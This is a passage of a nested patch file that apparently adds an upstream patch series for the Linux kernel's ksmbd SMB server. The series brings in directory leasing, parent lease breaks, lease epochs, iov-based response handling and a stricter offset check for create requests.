+ 	opinfo->o_lease = lease;
+ 
+@@ -395,8 +396,8 @@ void close_id_del_oplock(struct ksmbd_file *fp)
+ {
+ 	struct oplock_info *opinfo;
+ 
+-	if (S_ISDIR(file_inode(fp->filp)->i_mode))
+-		return;
++	if (fp->reserve_lease_break)
++		smb_lazy_parent_lease_break_close(fp);
+ 
+ 	opinfo = opinfo_get(fp);
+ 	if (!opinfo)
+@@ -543,12 +544,13 @@ static struct oplock_info *same_client_has_lease(struct ksmbd_inode *ci,
+ 			/* upgrading lease */
+ 			if ((atomic_read(&ci->op_count) +
+ 			     atomic_read(&ci->sop_count)) == 1) {
+-				if (lease->state ==
+-				    (lctx->req_state & lease->state)) {
++				if (lease->state != SMB2_LEASE_NONE_LE &&
++				    lease->state == (lctx->req_state & lease->state)) {
+ 					lease->state |= lctx->req_state;
+ 					if (lctx->req_state &
+ 						SMB2_LEASE_WRITE_CACHING_LE)
+ 						lease_read_to_write(opinfo);
++
+ 				}
+ 			} else if ((atomic_read(&ci->op_count) +
+ 				    atomic_read(&ci->sop_count)) > 1) {
+@@ -616,15 +618,6 @@ static int oplock_break_pending(struct oplock_info *opinfo, int req_op_level)
+ 	return 0;
+ }
+ 
+-static inline int allocate_oplock_break_buf(struct ksmbd_work *work)
+-{
+-	work->response_buf = kzalloc(MAX_CIFS_SMALL_BUFFER_SIZE, GFP_KERNEL);
+-	if (!work->response_buf)
+-		return -ENOMEM;
+-	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
+-	return 0;
+-}
+-
+ /**
+  * __smb2_oplock_break_noti() - send smb2 oplock break cmd from conn
+  * to client
+@@ -639,7 +632,6 @@ static void __smb2_oplock_break_noti(struct work_struct *wk)
+ {
+ 	struct smb2_oplock_break *rsp = NULL;
+ 	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
+-	struct ksmbd_conn *conn = work->conn;
+ 	struct oplock_break_info *br_info = work->request_buf;
+ 	struct smb2_hdr *rsp_hdr;
+ 	struct ksmbd_file *fp;
+@@ -648,7 +640,7 @@ static void __smb2_oplock_break_noti(struct work_struct *wk)
+ 	if (!fp)
+ 		goto out;
+ 
+-	if (allocate_oplock_break_buf(work)) {
++	if (allocate_interim_rsp_buf(work)) {
+ 		pr_err("smb2_allocate_rsp_buf failed! ");
+ 		ksmbd_fd_put(work, fp);
+ 		goto out;
+@@ -656,8 +648,6 @@ static void __smb2_oplock_break_noti(struct work_struct *wk)
+ 
+ 	rsp_hdr = smb2_get_msg(work->response_buf);
+ 	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
+ 	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
+ 	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+ 	rsp_hdr->CreditRequest = cpu_to_le16(0);
+@@ -684,13 +674,15 @@ static void __smb2_oplock_break_noti(struct work_struct *wk)
+ 	rsp->PersistentFid = fp->persistent_id;
+ 	rsp->VolatileFid = fp->volatile_id;
+ 
+-	inc_rfc1001_len(work->response_buf, 24);
++	ksmbd_fd_put(work, fp);
++	if (ksmbd_iov_pin_rsp(work, (void *)rsp,
++			      sizeof(struct smb2_oplock_break)))
++		goto out;
+ 
+ 	ksmbd_debug(OPLOCK,
+ 		    "sending oplock break v_id %llu p_id = %llu lock level = %d\n",
+ 		    rsp->VolatileFid, rsp->PersistentFid, rsp->OplockLevel);
+ 
+-	ksmbd_fd_put(work, fp);
+ 	ksmbd_conn_write(work);
+ 
+ out:
+@@ -751,18 +743,15 @@ static void __smb2_lease_break_noti(struct work_struct *wk)
+ 	struct smb2_lease_break *rsp = NULL;
+ 	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
+ 	struct lease_break_info *br_info = work->request_buf;
+-	struct ksmbd_conn *conn = work->conn;
+ 	struct smb2_hdr *rsp_hdr;
+ 
+-	if (allocate_oplock_break_buf(work)) {
++	if (allocate_interim_rsp_buf(work)) {
+ 		ksmbd_debug(OPLOCK, "smb2_allocate_rsp_buf failed! ");
+ 		goto out;
+ 	}
+ 
+ 	rsp_hdr = smb2_get_msg(work->response_buf);
+ 	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
+ 	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
+ 	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+ 	rsp_hdr->CreditRequest = cpu_to_le16(0);
+@@ -791,7 +780,9 @@ static void __smb2_lease_break_noti(struct work_struct *wk)
+ 	rsp->AccessMaskHint = 0;
+ 	rsp->ShareMaskHint = 0;
+ 
+-	inc_rfc1001_len(work->response_buf, 44);
++	if (ksmbd_iov_pin_rsp(work, (void *)rsp,
++			      sizeof(struct smb2_lease_break)))
++		goto out;
+ 
+ 	ksmbd_conn_write(work);
+ 
+@@ -844,7 +835,8 @@ static int smb2_lease_break_noti(struct oplock_info *opinfo)
+ 					     interim_entry);
+ 			setup_async_work(in_work, NULL, NULL);
+ 			smb2_send_interim_resp(in_work, STATUS_PENDING);
+-			list_del(&in_work->interim_entry);
++			list_del_init(&in_work->interim_entry);
++			release_async_work(in_work);
+ 		}
+ 		INIT_WORK(&work->work, __smb2_lease_break_noti);
+ 		ksmbd_queue_work(work);
+@@ -910,7 +902,8 @@ static int oplock_break(struct oplock_info *brk_opinfo, int req_op_level)
+ 					lease->new_state =
+ 						SMB2_LEASE_READ_CACHING_LE;
+ 			} else {
+-				if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
++				if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE &&
++						!lease->is_dir)
+ 					lease->new_state =
+ 						SMB2_LEASE_READ_CACHING_LE;
+ 				else
+@@ -1042,6 +1035,7 @@ static void copy_lease(struct oplock_info *op1, struct oplock_info *op2)
+ 	       SMB2_LEASE_KEY_SIZE);
+ 	lease2->duration = lease1->duration;
+ 	lease2->flags = lease1->flags;
++	lease2->epoch = lease1->epoch++;
+ }
+ 
+ static int add_lease_global_list(struct oplock_info *opinfo)
+@@ -1091,6 +1085,89 @@ static void set_oplock_level(struct oplock_info *opinfo, int level,
+ 	}
+ }
+ 
++void smb_send_parent_lease_break_noti(struct ksmbd_file *fp,
++				      struct lease_ctx_info *lctx)
++{
++	struct oplock_info *opinfo;
++	struct ksmbd_inode *p_ci = NULL;
++
++	if (lctx->version != 2)
++		return;
++
++	p_ci = ksmbd_inode_lookup_lock(fp->filp->f_path.dentry->d_parent);
++	if (!p_ci)
++		return;
++
++	read_lock(&p_ci->m_lock);
++	list_for_each_entry(opinfo, &p_ci->m_op_list, op_entry) {
++		if (!opinfo->is_lease)
++			continue;
++
++		if (opinfo->o_lease->state != SMB2_OPLOCK_LEVEL_NONE &&
++		    (!(lctx->flags & SMB2_LEASE_FLAG_PARENT_LEASE_KEY_SET_LE) ||
++		     !compare_guid_key(opinfo, fp->conn->ClientGUID,
++				      lctx->parent_lease_key))) {
++			if (!atomic_inc_not_zero(&opinfo->refcount))
++				continue;
++
++			atomic_inc(&opinfo->conn->r_count);
++			if (ksmbd_conn_releasing(opinfo->conn)) {
++				atomic_dec(&opinfo->conn->r_count);
++				continue;
++			}
++
++			read_unlock(&p_ci->m_lock);
++			oplock_break(opinfo, SMB2_OPLOCK_LEVEL_NONE);
++			opinfo_conn_put(opinfo);
++			read_lock(&p_ci->m_lock);
++		}
++	}
++	read_unlock(&p_ci->m_lock);
++
++	ksmbd_inode_put(p_ci);
++}
++
++void smb_lazy_parent_lease_break_close(struct ksmbd_file *fp)
++{
++	struct oplock_info *opinfo;
++	struct ksmbd_inode *p_ci = NULL;
++
++	rcu_read_lock();
++	opinfo = rcu_dereference(fp->f_opinfo);
++	rcu_read_unlock();
++
++	if (!opinfo->is_lease || opinfo->o_lease->version != 2)
++		return;
++
++	p_ci = ksmbd_inode_lookup_lock(fp->filp->f_path.dentry->d_parent);
++	if (!p_ci)
++		return;
++
++	read_lock(&p_ci->m_lock);
++	list_for_each_entry(opinfo, &p_ci->m_op_list, op_entry) {
++		if (!opinfo->is_lease)
++			continue;
++
++		if (opinfo->o_lease->state != SMB2_OPLOCK_LEVEL_NONE) {
++			if (!atomic_inc_not_zero(&opinfo->refcount))
++				continue;
++
++			atomic_inc(&opinfo->conn->r_count);
++			if (ksmbd_conn_releasing(opinfo->conn)) {
++				atomic_dec(&opinfo->conn->r_count);
++				continue;
++			}
++			read_unlock(&p_ci->m_lock);
++			oplock_break(opinfo, SMB2_OPLOCK_LEVEL_NONE);
++			opinfo_conn_put(opinfo);
++			read_lock(&p_ci->m_lock);
++		}
++	}
++	read_unlock(&p_ci->m_lock);
++
++	ksmbd_inode_put(p_ci);
++}
++
+ /**
+  * smb_grant_oplock() - handle oplock/lease request on file open
+  * @work:		smb work
+@@ -1114,10 +1191,6 @@ int smb_grant_oplock(struct ksmbd_work *work, int req_op_level, u64 pid,
+ 	bool prev_op_has_lease;
+ 	__le32 prev_op_state = 0;
+ 
+-	/* not support directory lease */
+-	if (S_ISDIR(file_inode(fp->filp)->i_mode))
+-		return 0;
+-
+ 	opinfo = alloc_opinfo(work, pid, tid);
+ 	if (!opinfo)
+ 		return -ENOMEM;
+@@ -1374,6 +1447,7 @@ void create_lease_buf(u8 *rbuf, struct lease *lease)
+ 		memcpy(buf->lcontext.LeaseKey, lease->lease_key,
+ 		       SMB2_LEASE_KEY_SIZE);
+ 		buf->lcontext.LeaseFlags = lease->flags;
++		buf->lcontext.Epoch = cpu_to_le16(++lease->epoch);
+ 		buf->lcontext.LeaseState = lease->state;
+ 		memcpy(buf->lcontext.ParentLeaseKey, lease->parent_lease_key,
+ 		       SMB2_LEASE_KEY_SIZE);
+@@ -1410,10 +1484,11 @@ void create_lease_buf(u8 *rbuf, struct lease *lease)
+ /**
+  * parse_lease_state() - parse lease context containted in file open request
+  * @open_req:	buffer containing smb2 file open(create) request
++ * @is_dir:	whether leasing file is directory
+  *
+  * Return:  oplock state, -ENOENT if create lease context not found
+  */
+-struct lease_ctx_info *parse_lease_state(void *open_req)
++struct lease_ctx_info *parse_lease_state(void *open_req, bool is_dir)
+ {
+ 	struct create_context *cc;
+ 	struct smb2_create_req *req = (struct smb2_create_req *)open_req;
+@@ -1431,8 +1506,14 @@ struct lease_ctx_info *parse_lease_state(void *open_req)
+ 		struct create_lease_v2 *lc = (struct create_lease_v2 *)cc;
+ 
+ 		memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
+-		lreq->req_state = lc->lcontext.LeaseState;
++		if (is_dir) {
++			lreq->req_state = lc->lcontext.LeaseState &
++				~SMB2_LEASE_WRITE_CACHING_LE;
++			lreq->is_dir = true;
++		} else
++			lreq->req_state = lc->lcontext.LeaseState;
+ 		lreq->flags = lc->lcontext.LeaseFlags;
++		lreq->epoch = lc->lcontext.Epoch;
+ 		lreq->duration = lc->lcontext.LeaseDuration;
+ 		memcpy(lreq->parent_lease_key, lc->lcontext.ParentLeaseKey,
+ 				SMB2_LEASE_KEY_SIZE);
+diff --git a/fs/smb/server/oplock.h b/fs/smb/server/oplock.h
+index 4b0fe6da76940..5b93ea9196c01 100644
+--- a/fs/smb/server/oplock.h
++++ b/fs/smb/server/oplock.h
+@@ -34,7 +34,9 @@ struct lease_ctx_info {
+ 	__le32			flags;
+ 	__le64			duration;
+ 	__u8			parent_lease_key[SMB2_LEASE_KEY_SIZE];
++	__le16			epoch;
+ 	int			version;
++	bool			is_dir;
+ };
+ 
+ struct lease_table {
+@@ -53,6 +55,7 @@ struct lease {
+ 	__u8			parent_lease_key[SMB2_LEASE_KEY_SIZE];
+ 	int			version;
+ 	unsigned short		epoch;
++	bool			is_dir;
+ 	struct lease_table	*l_lb;
+ };
+ 
+@@ -108,7 +111,7 @@ void opinfo_put(struct oplock_info *opinfo);
+ 
+ /* Lease related functions */
+ void create_lease_buf(u8 *rbuf, struct lease *lease);
+-struct lease_ctx_info *parse_lease_state(void *open_req);
++struct lease_ctx_info *parse_lease_state(void *open_req, bool is_dir);
+ __u8 smb2_map_lease_to_oplock(__le32 lease_state);
+ int lease_read_to_write(struct oplock_info *opinfo);
+ 
+@@ -124,4 +127,7 @@ struct oplock_info *lookup_lease_in_table(struct ksmbd_conn *conn,
+ int find_same_lease_key(struct ksmbd_session *sess, struct ksmbd_inode *ci,
+ 			struct lease_ctx_info *lctx);
+ void destroy_lease_table(struct ksmbd_conn *conn);
++void smb_send_parent_lease_break_noti(struct ksmbd_file *fp,
++				      struct lease_ctx_info *lctx);
++void smb_lazy_parent_lease_break_close(struct ksmbd_file *fp);
+ #endif /* __KSMBD_OPLOCK_H */
+diff --git a/fs/smb/server/server.c b/fs/smb/server/server.c
+index 9804cabe72a84..11b201e6ee44b 100644
+--- a/fs/smb/server/server.c
++++ b/fs/smb/server/server.c
+@@ -115,8 +115,10 @@ static int __process_request(struct ksmbd_work *work, struct ksmbd_conn *conn,
+ 	if (check_conn_state(work))
+ 		return SERVER_HANDLER_CONTINUE;
+ 
+-	if (ksmbd_verify_smb_message(work))
++	if (ksmbd_verify_smb_message(work)) {
++		conn->ops->set_rsp_status(work, STATUS_INVALID_PARAMETER);
+ 		return SERVER_HANDLER_ABORT;
++	}
+ 
+ 	command = conn->ops->get_cmd_val(work);
+ 	*cmd = command;
+@@ -163,6 +165,7 @@ static void __handle_ksmbd_work(struct ksmbd_work *work,
+ {
+ 	u16 command = 0;
+ 	int rc;
++	bool is_chained = false;
+ 
+ 	if (conn->ops->allocate_rsp_buf(work))
+ 		return;
+@@ -229,16 +232,17 @@ static void __handle_ksmbd_work(struct ksmbd_work *work,
+ 			}
+ 		}
+ 
++		is_chained = is_chained_smb2_message(work);
++
+ 		if (work->sess &&
+ 		    (work->sess->sign || smb3_11_final_sess_setup_resp(work) ||
+ 		     conn->ops->is_sign_req(work, command)))
+ 			conn->ops->set_sign_rsp(work);
+-	} while (is_chained_smb2_message(work));
+-
+-	if (work->send_no_response)
+-		return;
++	} while (is_chained == true);
+ 
+ send:
++	if (work->tcon)
++		ksmbd_tree_connect_put(work->tcon);
+ 	smb3_preauth_hash_rsp(work);
+ 	if (work->sess && work->sess->enc && work->encrypted &&
+ 	    conn->ops->encrypt_resp) {
+@@ -442,11 +446,9 @@ static ssize_t stats_show(struct class *class, struct class_attribute *attr,
+ 		"reset",
+ 		"shutdown"
+ 	};
+-
+-	ssize_t sz = scnprintf(buf, PAGE_SIZE, "%d %s %d %lu\n", stats_version,
+-			       state[server_conf.state], server_conf.tcp_port,
+-			       server_conf.ipc_last_active / HZ);
+-	return sz;
++	return sysfs_emit(buf, "%d %s %d %lu\n", stats_version,
++			  state[server_conf.state], server_conf.tcp_port,
++			  server_conf.ipc_last_active / HZ);
+ }
+ 
+ static ssize_t kill_server_store(struct class *class,
+@@ -478,19 +480,13 @@ static ssize_t debug_show(struct class *class, struct class_attribute *attr,
+ 
+ 	for (i = 0; i < ARRAY_SIZE(debug_type_strings); i++) {
+ 		if ((ksmbd_debug_types >> i) & 1) {
+-			pos = scnprintf(buf + sz,
+-					PAGE_SIZE - sz,
+-					"[%s] ",
+-					debug_type_strings[i]);
++			pos = sysfs_emit_at(buf, sz, "[%s] ", debug_type_strings[i]);
+ 		} else {
+-			pos = scnprintf(buf + sz,
+-					PAGE_SIZE - sz,
+-					"%s ",
+-					debug_type_strings[i]);
++			pos = sysfs_emit_at(buf, sz, "%s ", debug_type_strings[i]);
+ 		}
+ 		sz += pos;
+ 	}
+-	sz += scnprintf(buf + sz, PAGE_SIZE - sz, "\n");
++	sz += sysfs_emit_at(buf, sz, "\n");
+ 	return sz;
+ }
+ 
+@@ -599,8 +595,6 @@ static int __init ksmbd_server_init(void)
+ 	if (ret)
+ 		goto err_crypto_destroy;
+ 
+-	pr_warn_once("The ksmbd server is experimental\n");
+-
+ 	return 0;
+ 
+ err_crypto_destroy:
+diff --git a/fs/smb/server/smb2misc.c b/fs/smb/server/smb2misc.c
+index e881df1d10cbd..03dded29a9804 100644
+--- a/fs/smb/server/smb2misc.c
++++ b/fs/smb/server/smb2misc.c
+@@ -106,16 +106,25 @@ static int smb2_get_data_area_len(unsigned int *off, unsigned int *len,
+ 		break;
+ 	case SMB2_CREATE:
+ 	{
++		unsigned short int name_off =
++			le16_to_cpu(((struct smb2_create_req *)hdr)->NameOffset);
++		unsigned short int name_len =
++			le16_to_cpu(((struct smb2_create_req *)hdr)->NameLength);
++
+ 		if (((struct smb2_create_req *)hdr)->CreateContextsLength) {
+ 			*off = le32_to_cpu(((struct smb2_create_req *)
+ 				hdr)->CreateContextsOffset);
+ 			*len = le32_to_cpu(((struct smb2_create_req *)
+ 				hdr)->CreateContextsLength);
+-			break;
++			if (!name_len)
++				break;
++
++			if (name_off + name_len < (u64)*off + *len)
++				break;
+ 		}
+ 
+-		*off = le16_to_cpu(((struct smb2_create_req *)hdr)->NameOffset);
+-		*len = le16_to_cpu(((struct smb2_create_req *)hdr)->NameLength);
++		*off = name_off;
++		*len = name_len;
+ 		break;
+ 	}
+ 	case SMB2_QUERY_INFO:
+@@ -440,10 +449,8 @@ int ksmbd_smb2_check_message(struct ksmbd_work *work)
+ 
+ validate_credit:
+ 	if ((work->conn->vals->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU) &&
+-	    smb2_validate_credit_charge(work->conn, hdr)) {
+-		work->conn->ops->set_rsp_status(work, STATUS_INVALID_PARAMETER);
++	    smb2_validate_credit_charge(work->conn, hdr))
+ 		return 1;
+-	}
+ 
+ 	return 0;
+ }
+diff --git a/fs/smb/server/smb2ops.c b/fs/smb/server/smb2ops.c
+index ab23da2120b94..535402629655e 100644
+--- a/fs/smb/server/smb2ops.c
++++ b/fs/smb/server/smb2ops.c
+@@ -221,7 +221,8 @@ void init_smb3_0_server(struct ksmbd_conn *conn)
+ 	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
+ 
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING |
++			SMB2_GLOBAL_CAP_DIRECTORY_LEASING;
+ 
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION &&
+ 	    conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION)
+@@ -245,10 +246,12 @@ void init_smb3_02_server(struct ksmbd_conn *conn)
+ 	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
+ 
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING |
++			SMB2_GLOBAL_CAP_DIRECTORY_LEASING;
+ 
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION &&
+-	    conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION)
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION ||
++	    (!(server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION_OFF) &&
++	     conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION))
+ 		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
+ 
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
+@@ -269,7 +272,13 @@ int init_smb3_11_server(struct ksmbd_conn *conn)
+ 	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
+ 
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING |
++			SMB2_GLOBAL_CAP_DIRECTORY_LEASING;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION ||
++	    (!(server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION_OFF) &&
++	     conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION))
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
+ 
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
+ 		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 1598ad6155fef..ea48dd06d4da3 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -144,12 +144,18 @@ void smb2_set_err_rsp(struct ksmbd_work *work)
+ 		err_rsp = smb2_get_msg(work->response_buf);
+ 
+ 	if (err_rsp->hdr.Status != STATUS_STOPPED_ON_SYMLINK) {
++		int err;
++
+ 		err_rsp->StructureSize = SMB2_ERROR_STRUCTURE_SIZE2_LE;
+ 		err_rsp->ErrorContextCount = 0;
+ 		err_rsp->Reserved = 0;
+ 		err_rsp->ByteCount = 0;
+ 		err_rsp->ErrorData[0] = 0;
+-		inc_rfc1001_len(work->response_buf, SMB2_ERROR_STRUCTURE_SIZE2);
++		err = ksmbd_iov_pin_rsp(work, (void *)err_rsp,
++					__SMB2_HEADER_STRUCTURE_SIZE +
++						SMB2_ERROR_STRUCTURE_SIZE2);
++		if (err)
++			work->send_no_response = 1;
+ 	}
+ }
+ 
+@@ -224,11 +230,12 @@ void set_smb2_rsp_status(struct ksmbd_work *work, __le32 err)
+ {
+ 	struct smb2_hdr *rsp_hdr;
+ 
+-	if (work->next_smb2_rcv_hdr_off)
+-		rsp_hdr = ksmbd_resp_buf_next(work);
+-	else
+-		rsp_hdr = smb2_get_msg(work->response_buf);
++	rsp_hdr = smb2_get_msg(work->response_buf);
+ 	rsp_hdr->Status = err;
++
++	work->iov_idx = 0;
++	work->iov_cnt = 0;
++	work->next_smb2_rcv_hdr_off = 0;
+ 	smb2_set_err_rsp(work);
+ }
+ 
+@@ -244,9 +251,7 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 	struct smb2_hdr *rsp_hdr;
+ 	struct smb2_negotiate_rsp *rsp;
+ 	struct ksmbd_conn *conn = work->conn;
+-
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
++	int err;
+ 
+ 	rsp_hdr = smb2_get_msg(work->response_buf);
+ 	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+@@ -285,13 +290,14 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 	rsp->SecurityBufferLength = cpu_to_le16(AUTH_GSS_LENGTH);
+ 	ksmbd_copy_gss_neg_header((char *)(&rsp->hdr) +
+ 		le16_to_cpu(rsp->SecurityBufferOffset));
+-	inc_rfc1001_len(work->response_buf,
+-			sizeof(struct smb2_negotiate_rsp) -
+-			sizeof(struct smb2_hdr) - sizeof(rsp->Buffer) +
+-			AUTH_GSS_LENGTH);
+ 	rsp->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED_LE;
+ 	if (server_conf.signing == KSMBD_CONFIG_OPT_MANDATORY)
+ 		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
++	err = ksmbd_iov_pin_rsp(work, rsp,
++				sizeof(struct smb2_negotiate_rsp) -
++				sizeof(rsp->Buffer) + AUTH_GSS_LENGTH);
++	if (err)
++		return err;
+ 	conn->use_spnego = true;
+ 
+ 	ksmbd_conn_set_need_negotiate(conn);
+@@ -390,11 +396,12 @@ static void init_chained_smb2_rsp(struct ksmbd_work *work)
+ 	next_hdr_offset = le32_to_cpu(req->NextCommand);
+ 
+ 	new_len = ALIGN(len, 8);
+-	inc_rfc1001_len(work->response_buf,
+-			sizeof(struct smb2_hdr) + new_len - len);
++	work->iov[work->iov_idx].iov_len += (new_len - len);
++	inc_rfc1001_len(work->response_buf, new_len - len);
+ 	rsp->NextCommand = cpu_to_le32(new_len);
+ 
+ 	work->next_smb2_rcv_hdr_off += next_hdr_offset;
++	work->curr_smb2_rsp_hdr_off = work->next_smb2_rsp_hdr_off;
+ 	work->next_smb2_rsp_hdr_off += new_len;
+ 	ksmbd_debug(SMB,
+ 		    "Compound req new_len = %d rcv off = %d rsp off = %d\n",
+@@ -470,10 +477,10 @@ bool is_chained_smb2_message(struct ksmbd_work *work)
+ 		len = len - get_rfc1002_len(work->response_buf);
+ 		if (len) {
+ 			ksmbd_debug(SMB, "padding len %u\n", len);
++			work->iov[work->iov_idx].iov_len += len;
+ 			inc_rfc1001_len(work->response_buf, len);
+-			if (work->aux_payload_sz)
+-				work->aux_payload_sz += len;
+ 		}
++		work->curr_smb2_rsp_hdr_off = work->next_smb2_rsp_hdr_off;
+ 	}
+ 	return false;
+ }
+@@ -488,11 +495,8 @@ int init_smb2_rsp_hdr(struct ksmbd_work *work)
+ {
+ 	struct smb2_hdr *rsp_hdr = smb2_get_msg(work->response_buf);
+ 	struct smb2_hdr *rcv_hdr = smb2_get_msg(work->request_buf);
+-	struct ksmbd_conn *conn = work->conn;
+ 
+ 	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
+ 	rsp_hdr->ProtocolId = rcv_hdr->ProtocolId;
+ 	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+ 	rsp_hdr->Command = rcv_hdr->Command;
+@@ -508,12 +512,6 @@ int init_smb2_rsp_hdr(struct ksmbd_work *work)
+ 	rsp_hdr->SessionId = rcv_hdr->SessionId;
+ 	memcpy(rsp_hdr->Signature, rcv_hdr->Signature, 16);
+ 
+-	work->syncronous = true;
+-	if (work->async_id) {
+-		ksmbd_release_id(&conn->async_ida, work->async_id);
+-		work->async_id = 0;
+-	}
+-
+ 	return 0;
+ }
+ 
+@@ -549,7 +547,7 @@ int smb2_allocate_rsp_buf(struct ksmbd_work *work)
+ 	if (le32_to_cpu(hdr->NextCommand) > 0)
+ 		sz = large_sz;
+ 
+-	work->response_buf = kvmalloc(sz, GFP_KERNEL | __GFP_ZERO);
++	work->response_buf = kvzalloc(sz, GFP_KERNEL);
+ 	if (!work->response_buf)
+ 		return -ENOMEM;
+ 
+@@ -659,21 +657,16 @@ smb2_get_name(const char *src, const int maxlen, struct nls_table *local_nls)
+ 
+ int setup_async_work(struct ksmbd_work *work, void (*fn)(void **), void **arg)
+ {
+-	struct smb2_hdr *rsp_hdr;
+ 	struct ksmbd_conn *conn = work->conn;
+ 	int id;
+ 
+-	rsp_hdr = smb2_get_msg(work->response_buf);
+-	rsp_hdr->Flags |= SMB2_FLAGS_ASYNC_COMMAND;
+-
+ 	id = ksmbd_acquire_async_msg_id(&conn->async_ida);
+ 	if (id < 0) {
+ 		pr_err("Failed to alloc async message id\n");
+ 		return id;
+ 	}
+-	work->syncronous = false;
++	work->asynchronous = true;
+ 	work->async_id = id;
+-	rsp_hdr->Id.AsyncId = cpu_to_le64(id);
+ 
+ 	ksmbd_debug(SMB,
+ 		    "Send interim Response to inform async request id : %d\n",
+@@ -691,18 +684,47 @@ int setup_async_work(struct ksmbd_work *work, void (*fn)(void **), void **arg)
+ 	return 0;
+ }
+ 
++void release_async_work(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++
++	spin_lock(&conn->request_lock);
++	list_del_init(&work->async_request_entry);
++	spin_unlock(&conn->request_lock);
++
++	work->asynchronous = 0;
++	work->cancel_fn = NULL;
++	kfree(work->cancel_argv);
++	work->cancel_argv = NULL;
++	if (work->async_id) {
++		ksmbd_release_id(&conn->async_ida, work->async_id);
++		work->async_id = 0;
++	}
++}
++
+ void smb2_send_interim_resp(struct ksmbd_work *work, __le32 status)
+ {
+ 	struct smb2_hdr *rsp_hdr;
++	struct ksmbd_work *in_work = ksmbd_alloc_work_struct();
+ 
+-	rsp_hdr = smb2_get_msg(work->response_buf);
+-	smb2_set_err_rsp(work);
++	if (allocate_interim_rsp_buf(in_work)) {
++		pr_err("smb_allocate_rsp_buf failed!\n");
++		ksmbd_free_work_struct(in_work);
++		return;
++	}
++
++	in_work->conn = work->conn;
++	memcpy(smb2_get_msg(in_work->response_buf), ksmbd_resp_buf_next(work),
++	       __SMB2_HEADER_STRUCTURE_SIZE);
++
++	rsp_hdr = smb2_get_msg(in_work->response_buf);
++	rsp_hdr->Flags |= SMB2_FLAGS_ASYNC_COMMAND;
++	rsp_hdr->Id.AsyncId = cpu_to_le64(work->async_id);
++	smb2_set_err_rsp(in_work);
+ 	rsp_hdr->Status = status;
+ 
+-	work->multiRsp = 1;
+-	ksmbd_conn_write(work);
+-	rsp_hdr->Status = 0;
+-	work->multiRsp = 0;
++	ksmbd_conn_write(in_work);
++	ksmbd_free_work_struct(in_work);
+ }
+ 
+ static __le32 smb2_get_reparse_tag_special_file(umode_t mode)
+@@ -774,19 +796,6 @@ static void build_encrypt_ctxt(struct smb2_encryption_neg_context *pneg_ctxt,
+ 	pneg_ctxt->Ciphers[0] = cipher_type;
+ }
+ 
+-static void build_compression_ctxt(struct smb2_compression_capabilities_context *pneg_ctxt,
+-				   __le16 comp_algo)
+-{
+-	pneg_ctxt->ContextType = SMB2_COMPRESSION_CAPABILITIES;
+-	pneg_ctxt->DataLength =
+-		cpu_to_le16(sizeof(struct smb2_compression_capabilities_context)
+-			- sizeof(struct smb2_neg_context));
+-	pneg_ctxt->Reserved = cpu_to_le32(0);
